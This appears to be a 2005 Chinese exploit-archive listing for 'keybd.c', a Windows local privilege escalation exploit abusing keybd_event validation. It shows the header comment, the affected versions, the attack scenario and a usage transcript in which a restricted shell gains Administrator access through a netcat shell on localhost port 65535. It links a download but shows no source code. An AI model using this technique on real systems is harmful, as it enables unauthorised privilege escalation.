keybd.c提交时间:2005-09-06 提交用户:Sowhat 工具分类:攻击程序 运行平台:Windows 工具大小:5075 Bytes 文件MD5 :e9e8964a8223eeac5429ccbff0529f69 工具来源:http://www.haxorcitos.com/MSRC-6005bgs-EN.txt zz Local privilege Escalation Exploit,No patch avaible yet /* * Microsoft Windows keybd_event validation vulnerability. * Local privilege elevation * * Credits: Andres Tarasco ( aT4r _@_ haxorcitos.com <http://haxorcitos.com>) * I馻ki Lopez ( ilo _@_ reversing.org <http://reversing.org> ) * * Platforms afected/tested: * * - Windows 2000 * - Windows XP * - Windows 2003 * * * Original Advisory: http://www.haxorcitos.com * http://www.reversing.org * * Exploit Date: 08 / 06 / 2005 * * Orignal Advisory: * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS" * AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION * WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED. * * Attack Scenario: * * a) An attacker who gains access to an unprivileged shell/application executed * with the application runas. * b) An attacker who gains access to a service with flags INTERACT_WITH_DESKTOP * * Impact: * * Due to an invalid keyboard input validation, its possible to send keys to any * application of the Desktop. * By sending some short-cut keys its possible to execute code and elevate privileges * getting loggued user privileges and bypass runas/service security restriction. * * Exploit usage: * * C:\>whoami * AQUARIUS\Administrador * * C:\>runas /user:restricted cmd.exe * Enter the password for restricted: * Attempting to start cmd.exe as user "AQUARIUS\restricted" ... * * * Microsoft Windows 2000 [Version.00.2195] * (C) Copyright 1985-2000 Microsoft Corp. * * C:\WINNT\system32>cd \ * * C:\>whoami * AQUARIUS\restricted * * C:\>tlist.exe |find "explorer.exe" * 1140 explorer.exe Program Manager * * C:\>c:\keybd.exe 1140 * HANDLE Found. Attacking =) * * C:\>nc localhost 65535 * Microsoft Windows 2000 [Versi󮠵.00.2195] * (C) Copyright 1985-2000 Microsoft Corp. * * C:\>whoami * whoami * AQUARIUS\Administrador * * * DONE =) * */ >> 下载 << |
